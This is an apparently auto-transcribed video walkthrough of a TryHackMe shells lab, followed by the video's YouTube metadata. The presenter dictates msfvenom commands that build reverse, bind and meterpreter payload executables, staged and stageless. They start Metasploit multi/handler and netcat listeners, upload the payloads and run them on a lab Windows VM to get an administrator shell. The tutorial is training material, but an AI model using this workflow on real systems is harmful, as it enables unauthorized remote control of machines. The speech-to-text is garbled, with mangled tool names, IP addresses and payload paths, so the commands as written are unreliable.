for now we're going to go ahead and try that command again I'm going to check the show options one more time looks like the port is set the L host is set so everything looks like it's set correctly we'll go ahead and run that all right so it is listening is doing the reverse TCP Handler on the attack boox IP address with the port 1 2 3 4 so yes it it does seem like this may be an unstable internet connection it did close that session and I didn't even create a session so that shows you something the fact that we shut down The Interpreter session started it back up again that executable file was running that whole time looking to connect back to that interpreter IP address for the lhost that we set in that reverse shell executable file for that Windows machine so if we run a who am I command that should tell us what user we are currently logged in as and it looks like it aired out the session closed again we'll do a control Z which will background that interpreter shell and it looks like it stopped the msf console entirely clear it out and try msf console again I'm going to open up a new terminal and try changing the port for the executable file which may be causing the problem and in the Mator will'll type that msf Venom command again so that's going to be msf Venom DP Windows the same one that was given to us in the msf Venom t task 9 msf Venom DP Windows SL x64 SL shell SL reverse TCP and we're going to have this as an executable file so- fexe - o and we're going to give it a different name we'll give it shell 3.exe as the name lhost is going to equal our attack boox IP address that one up at the top there 1010 it seems to be just a poor internet connection my triaging box just disconnected so that just right there 1010 28123 space l Port now for the L Port this time we'll do a different one besides 1 2 3 4 let's try 678 9 press enter okay the file was created with a file size of 7,168 bytes we'll go ahead and check that out to make sure it is there we'll click the places we'll click the home folder and we do have that shell 3.exe file so we'll go ahead and upload that file and then switch back over to the windows VM so to do that within our attack box we'll go to the browser and upload that file so we'll browse to our root home directory which is where our file was saved open and submit looks like it was uploaded success let's go check on the Windows VM so we'll switch over to the windows VM we will open up that web browser click cancel on that we'll press enter to view the uploads again and it looks like we do have a new file shell 3.exe so we'll go back to the terminal and make sure that our listener is listening on the correct Port so create a interpreter session we're going to use msf console that will start the Min Bo framework console and we're going to use the multi for SL Handler oops make sure that's spelled correctly all right it is taking us to the payload generic shell reverse TCP and we will set the lhost to R [Music] 101028 123 that attack box IP address up there press enter set the L Port this time not to 1234 but to 6789 press enter we'll do a final show options to check that everything is set correctly and it looks like it is so we'll go ahead and run that and once we've gotten that confirmation that it started that reverse TCP Handler on the attack box IP address with the New Port we go ahead and switch over to the windows VM and activate that shell 3.exe you can double click it or we could cancel that and we could type in the name of the file after uploads forsh 3.exe and it'll pretty much do the same thing it'll prompt us asking us if we want to save or run the file and we'll go ahead and save that now if we look in our downloads folder we'll see that it is there we'll double click that to run it and click run and we'll watch to see if there's a connection made aha it looks like a shell was created and then the command shell session closed once again that may be because this is an unstable internet connection once again we're running a VM within a VM so that can tend to slow things down a little bit command shell is closed so if you save that file run it will see that we still are getting the command shell sessions closing it's unstable connection so first things first we're going to create our Windows meterpreter reverse shell executable file which we can find examples for in the task 9 msf Venom and we are not going to use this command msf Venom DP for the reverse shell for Windows we're actually going to use the one it's a little further down that is the windows x64 interpreter reverse TCP so the above was just an msf Venom reverse shell this is actually going to be a meterpreter reverse shell which we are going to use with the multi- Handler in menus so it's still going to be a 64-bit Windows meterpreter shell it's just going to be that it's a meterpreter that it's using to create that msf Venom reverse shell so we'll go ahead and open up a new terminal within the attack box and we will use that same msf Venom command but we will change it slightly so that it's interpreter so that full command will be msf venom dasp for payload and then the type and also concurrently the location of that payload within msf Venom is going to be Windows SL x64 SL shell but if we scroll down to the bottom we'll actually see the examples for the windows meterpreter reverse shell which we can see is also x64 bits so right after the x64 instead of shell we're going to do for SL meterpreter slash reverse TCP all right make sure that you put in that meterpreter cuz the listener we create is going to be using that same meterpreter through msfm finish out the command-f is going to be an executable file so EXE the name of the file we'll do shell 5.exe I've actually created about four of these so you can do this through trial and error the first one may not work for you I initially tried that msf Venom shell reverse TCP command and that did create a file an executable file that was run but ultimately it was not successful because when we were listening through the meterpreter session of course it's not meterpreter it's just a reverse shell so trial in Air Guys we've got that interpreter we have shell 5.exe as the name the listening host or the lhost is going to be equal to the attack box IP address right there 10.10 28123 and don't press enter just yet we're going to do a space and the L Port is going to be we'll do 1 2 3 4 and press enter huh looks like something happened it looks like it errored out and that file was not created we can check that in the root home folder so we go to our places home folder nope that did not work but if we do a search for msf Venom payloads related to interpreter we can do a msf Venom D- list of payloads and then we'll do a pipe so we can search we'll GP to search for specific keywords and those are going to be in quotes it's going to be windows for slash it's going to be 64 bits so x64 and then a for Slash meterpreter and then end quotations press enter looks like the payloads was spelled incorrectly do a double check that everything is spelled correctly then press enter and we'll see what pops up here we go we have a interpore reverse TCP so that looks like the same interpreter payload that we just tried this is going to be the windows x64 interpreter SL reverse TCP so upon closer inspection of the question it does just say use the shell it doesn't have to be a reverse shell it could be a bind shell remember these questions are just experimental so go free do whatever you would like on this I'm going to go ahead and try a bind shell and we're going to use the same command msf Venom - P for the payload but this time we will change The Interpreter SL reverse TCP to this one right here mpor bind TCP so we know that that one exists we'll give it a shot reverse uncore bind undor TCP Das app everything's going to be the same and press enter invalid payload it looks like there was not a slash in between the meterpreter and reverse It's actually an underscore so give that another shot and that is also the case for the actual reverse shell so it didn't matter that's why it was giving us that weird error is because we had a forward slash in between The Interpreter and reverse so we go ahead and you can do a bind shell you can do a reverse shell you can do uh any shell that you would like for this one that you can get so we'll change that interpreter toore reverse TCP DF and everything looks good we'll press enter it gave us a bunch of gobbly go this time we will try the Mater underscore reverse bind TCP give that a shot I don't get it let's look back through the msf Venom Windows 64x64 bit interpreter payloads that are available so we'll use that Windows x64 interpreter SL reverse TCP payload put in the L host as our attack boox IP put in the L Port 1 2 3 4 looks like it had a little bit of an issue so since tryck is not cooperating we did manage to get a connection however short brief it was we will go ahead and close down this Windows box and we will try this in the Linux box cuz actually the last question was referring to Linux or Windows so you can pretty much use whatever boxes you want for these questions just a matter of getting some practice in and trying different techniques so we'll go ahead and terminate that windshell practice we'll go ahead and click completed on the Windows practice box since we're done with that one and we'll go ahead and start the attack box up again but this time we're going to use the Linux practice box and we'll use the meterpreter session on that to create it through msfm so we'll go ahead and wait for that attack box to start up again and once that attack box is started we'll go ahead and click the green start machine button for that Linux IP address to populate for the Target machine we'll open up a new terminal you'll go into the task 9 msf Venom and it looks like they give us a Linux 32bit stagelist meterpreter payload so this is something that's not stage it's not going to have to run on multiple machines multiple stages it's just going to go boom right on the target machine so let's go let's do that we'll take the command from the top there msf Venom DP this is going to create that exe file we'll do Linux for Slash and the payload was x86 so X8 6 SL meterpreter _ reverse TCP and now we go back up to the command we'll finish that out it's going to be a exe file and we're going to name it shell. exe and the L host is going to be equal to our attack box IP address the listening host up at the top there 1010 210172 space and then we will set the L port to whatever you youd like I'll do 777 and press enter and that will create our executable file for the windows shell okay looks like that file was created with 7,168 bytes now we'll upload it to the web server so how do we do that so we'll go ahead to our browser and we will type in that IP address right there for the populated Windows shell practice that's going to be HTTP c1010 23628 for me yours going to be different than mine press enter and we can browse will go to the root home directory the directory that you were in when you created a file if you are uncertain which directory you were in when you created that file just to a simple PWD to print the working directory and we can see there right there the root home directory there it is shell. exe and we'll submit that now that it's uploaded we'll actually activate it from the target machine so we will use the windows VM to do that you can use the RDP command in task 15 they provide it right there so we'll go go ahead and copy that we will paste that into the clipboard copy it from the clipboard paste that in and we'll sign in as the administrator using that password press enter say yes trust the certificate we'll say yes all right so it's rping in we're getting closer to activating that shell okay so once we're rped in we'll go ahead and open up a new web browser and we'll type in the IP address http co10 do10 23628 press enter now we will do a for SL uploads because it's uploaded regardless of what VM you're looking at this through the internet from and we can see the shell. exe files there we'll click that and that will prompt us to save the file so we'll save that then in the file explorer we'll go to our downloads folder and there it is shell. exe and to execute files you just double click and we can see this app can't run on your PC to find a version for for your PC check with software publisher so it looks like we'll close that see if we can run it again so it says smart screen can't be reached right now if we run it we actually don't have the interpretor listener set up just quite yet so it's not going to do anything so if we go back to the interpretor session our attack box we'll go ahead and create a new terminal that we can create a interpreter listener from this will be using msf consoles to start the medit multi- Handler interpreter multi- Handler all right once mplay is loaded all you have to do is use multi for SL Handler press enter now that we're using the generic shell reverse TCP we'll go ahead and set the L host to 10.10 do the attack boox IP address which is up there at the top then we'll show options to see if there's anything else that we need to set looks like we need to set the L port and then that'll be it so we will set the L port to 777 press enter is going to be the same port that you specified in that executable file that we uploaded so go ahead and run that now it is started the reverse TCP listener on the attack box IP address using the port 777 which was the port specified in the executable now we'll go ahead and activate that executable file we'll go back to the RDP session and we'll click into the file explorer we'll find that file we'll double click it to run and activate that shell. exe and see what happens and if we check the reverse terminal we can see that a session has been open and closed it's creating multiple sessions it's try connect there's unstable internet connection or it's just because Tri Acme is wonky and if you did somehow manage to get a successful connection you can go ahead and use the Menlo commands within that shell the reverse shell to play around with the system experiment with it see what's inside look at files you've owned that box give yourself a p on the back but if you're like the rest of us you go ahead don't feel good if you move on we have proven as the question has asked that you can create a meterpreter session using reverse shells on Windows system so give yourselves the power on the back even if it doesn't work perfectly remember it's just about trying the technique out and learning some of these Concepts we'll go ahead and click completed on that and we'll also go ahead and click the completed box for that task 15 windows practice box and we'll tackle that last question which is create both staged and stagelist Mator shelves for either Target upload and manually activate them catching the Shell with metat does this work so since we're already using the windows box we might as well use this box to create a staged and stagelist payload now we're going to go ahead and cancel this session we'll clear it we'll exit out and to create our stagel payload we'll type the command used previously msf Venom DP for payload Windows x64 shell SL reverse TCP and instead of a forward slash we're going to put a what is it you guess it an underscore because an underscore means that it's stag less it means boom once we get it on the target system it's run it's self-sufficient it does pretty much everything it doesn't need to enact and do another action it just runs right off the target system then we're going to do the- F it's going to be an exe executable the output file name is going to be shell 2.exe because this will be our second executable file do lhost is the attack boox IP 10.10 30242 we'll do a space and then the L Port is going to be we'll do 1 2 3 4 and then press enter aha so our files been created we'll go ahead and upload that to the file server we browse and this will be shell two .exe we'll open that submit and then we'll pop over to the RDP session we'll do a quick Refresh on the uploads directory we'll see that shell 2.exe we will save that file and then in the file explorer we'll double click that shell two ah seems that it can't be run now before we activate it we're actually going to do a simple netcat command nc- LV NP from our attack box and the port that you specified in the file I did 1 2 3 4 and it's listing on any IP address through Port 1 2 3 4 so if we activate it because this is a stagel shell it should just automatically connect we'll go ahead and go back to the file explorer and we'll double click that shell 2.exe looks like the spinning turquoise Wheels there we will run that and that is at the operating system level like I said there's safeguards protective layers in the operating system to protect against malicious files being run often times you cannot even download these malicious executable files let alone run them on different machines but this is a Windows 2019 server running a zamp so it's designed in a sandbox environment so that we can have fun and play around with it right and as you know the older a system gets without updates without patches the more susceptible it is to different attacks now we'll switch back over to the terminal and as we can see we have a session within the Windows machine woohoo we are the administrator in the downloads folder can run in LS oh LS is a Linux command remember we're in Windows now to do a staged command let's do the same thing we'll create the file but this time it's going to be a staged reverse shell so a staged payload is actually the command that we just used the windows x64 interpreter SL reverse TCB you'll notice that there's lots of forward slashes indicating that it is stage between a stage and a stage less payload is that the stage payload is actually more likely to be stable and to avoid firewalls because once it's sent to the machine and that connection's created that listening connection is created between the target machine and the attack box there is an additional step which it is activated instead of just being activated immediately once that connection is created all in one Fell Swoop so in essence we've already done this so on that note we'll go ahead and click completed on all the tasks give yourselves a pat on the back you did an excellent job this was the in my opinion hardest tracky Junior penetration test or lesson so kudos to you guys for giving it your best I hope that you learned something in this lesson good work today on learning the tactics for using all different kinds of shells reverse shells bind shells interpreter shells we did pretty much everything so so hats off to you guys by the way don't let this be the thing that makes you not want to be a penetration tester just because it's confusing or you're not getting it or you just don't like how the lessons are laid out because when you're doing pen testing for real it can be a lot different than just coursework often times it'll be a lot funner too so this video is long enough as it is but I just want to say I'm proud of you guys thanks for sticking with me I'll see you in the next one try hack me Prix PR linage every I will see you guys in the Next Room Linux privilege escalation I know that we covered Linux a little bit we covered a little bit of Windows now we're going to focus just on Linux I'll see you in the next one I'm Brock from Brock art security keep hustling and take care

Info

Channel: Brock Rosen

Views: 1,578

Rating: undefined out of 5

Keywords: free course, beginner, cybersecurity, cyber security, ethical hacking, how to hack, hacking tutorial, junior, what is, penetration test, hacking, free, training, tactics, introductory, friendly, for dummies, get started, lookup, answers, flag, flags, what is a shell, tools, types of shell, netcat, shell stabilization, socat, encrypted shells, common shell payloads, msfvenom, metasploit multi/handler, webshells, next steps, practice and examples, linux practice box, windows practice box, task

Id: zc5Z6C2zmNA

Channel Id: undefined

Length: 127min 32sec (7652 seconds)

Published: Sat Dec 09 2023